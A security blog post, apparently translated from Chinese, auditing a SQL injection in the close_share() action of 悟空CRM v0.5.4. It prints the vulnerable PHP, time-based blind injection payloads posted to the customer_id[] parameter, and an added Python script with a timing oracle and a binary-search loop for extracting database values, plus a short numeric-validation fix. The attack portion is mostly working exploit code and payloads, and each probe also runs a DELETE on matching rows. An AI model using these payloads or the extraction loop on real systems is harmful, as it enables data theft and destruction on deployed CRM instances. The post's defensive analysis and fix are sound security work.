蜗蜗侠's Blog - Focused on Network Security (mobile edition)


Auditing a SQL Injection in 悟空CRM Latest Version V0.5.4

Nobody has been writing about code auditing for a while. (The vulnerability has already been reported, so don't get any ideas.)

The problem is in
5Kcrmv0.5.4/App/Lib/Action/CustomerAction.class.php

```php
public function close_share(){
    if($this->isPost()){
        $m_share = M('customerShare');
        // The request array is joined with commas; no element is validated
        $customer_ids = is_array($_POST['customer_id']) ? implode(',', $_POST['customer_id']) : '';
        if (empty($customer_ids)) {
            alert('error', L('HAVE_NOT CHOOSE_ANY CONTENT'), $_SERVER['HTTP_REFERER']);
        } else {
            // Sink: the joined string is substituted unquoted into the where() condition
            $is_deleted = $m_share->where('customer_id in (%s)', $customer_ids)->delete();
            if($is_deleted){
                alert('success', '关闭共享成功!', $_SERVER["HTTP_REFERER"]); // "sharing closed successfully"
            }else{
                alert('error', '关闭共享失败!', $_SERVER["HTTP_REFERER"]);   // "failed to close sharing"
            }
        }
    }
}
```

After the array parameter customer_id is read, its elements are joined with commas into a string and passed straight into the where() condition: no filtering, and no quotes around the value. Because the attacker-controlled string lands unquoted inside in (...), escaping quote characters would not help either, which is why the payload below uses a hex literal (0x726f6f74 = 'root') rather than a quoted string. This is injectable:
http://127.0.0.1/5Kcrmv0.5.4/ind ... r&a=close_share

POST: customer_id[]=1) and if(substring(user(),1,4)=0x726f6f74,sleep(5),1))-- 1

When the first four characters of user() are root, the delay fires and the response comes back about 5 seconds late.


When the comparison is false, there is no delay:

customer_id[]=1) and if(substring(user(),1,4)=0x111,sleep(5),1))-- 1
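As an added example (not code from the 悟空CRM project or from the original post), the following Python models the close_share() sink, rebuilds the SQL that the two payloads above produce, shows the minimal input-validation fix, and generalizes the single substring(user(),1,4)=0x726f6f74 check into a byte-wise extraction loop driven by a timing oracle. It assumes the table is named customer_share, that ThinkPHP 3.x wraps a string where() condition in an outer pair of parentheses (which is what the payload's trailing `)` balances), and it uses a constructed FAKE_USER value in place of a real target so that it runs offline.

```python
"""Added example, not code from the 悟空CRM project: models the close_share()
sink, rebuilds the SQL the payloads produce, shows the minimal fix, and
generalizes the one-off time-based check into a byte-wise extraction loop.
Assumptions: table name customer_share, the outer "( ... )" ThinkPHP 3.x adds
around a string where() condition, and the constructed FAKE_USER value."""
import re
import time
from typing import Callable, List

TEMPLATE = "DELETE FROM customer_share WHERE ( customer_id in (%s) )"


def vulnerable_where(customer_id: List[str]) -> str:
    """Mirror of the PHP: implode(',', $_POST['customer_id']) dropped into %s."""
    return TEMPLATE % ",".join(customer_id)


def safe_where(customer_id: List[str]) -> str:
    """Minimal fix: accept only decimal integers before joining them."""
    ids = []
    for v in customer_id:
        if not re.fullmatch(r"[0-9]+", v):
            raise ValueError("customer_id must be numeric, got %r" % v)
        ids.append(str(int(v)))
    return TEMPLATE % ",".join(ids)


def time_payload(cond: str, delay: float = 5) -> str:
    """One customer_id[] element: close the in(, add if(cond,sleep,1), comment out the tail."""
    return "1) and if(%s,sleep(%s),1))-- 1" % (cond, delay)


def timing_oracle(send: Callable[[str], None], delay: float = 5) -> Callable[[str], bool]:
    """Turn a function that POSTs customer_id[]=<payload> to the target into a
    boolean oracle: the condition held if the request took at least `delay` s.
    `send` is left to the caller (e.g. a requests.post wrapper); it is assumed."""
    def oracle(cond: str) -> bool:
        start = time.monotonic()
        send(time_payload(cond, delay))
        return time.monotonic() - start >= delay
    return oracle


def extract_blind(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the value of a SQL expression one character at a time by
    binary-searching its ASCII code (7 oracle calls per character), the
    general form of the single substring(user(),1,4)=0x726f6f74 check."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("ascii(substring(%s,%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substring() past the end yields '' and ascii('') is 0
            break
        out += chr(lo)
    return out


FAKE_USER = "root@localhost"  # constructed stand-in for the target's user()


def simulated_oracle(cond: str) -> bool:
    """Offline stand-in for timing_oracle: evaluates the injected condition
    against FAKE_USER instead of sending it to a server."""
    m = re.fullmatch(r"ascii\(substring\(user\(\),(\d+),1\)\)>(\d+)", cond)
    if not m:
        raise ValueError("unsupported condition: " + cond)
    pos, n = int(m.group(1)), int(m.group(2))
    code = ord(FAKE_USER[pos - 1]) if pos <= len(FAKE_USER) else 0
    return code > n


if __name__ == "__main__":
    print(vulnerable_where([time_payload("substring(user(),1,4)=0x726f6f74")]))
    print(extract_blind(simulated_oracle, "user()"))
```

Against a live instance you would replace simulated_oracle with timing_oracle(send), where send performs the POST to the close_share action; the extraction loop itself does not change. Note that every probe still executes the DELETE on whichever customer_share rows match customer_id = 1, so run this only against a test database.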




A look at the SQL as executed:

(Editor in charge: 蜗蜗侠)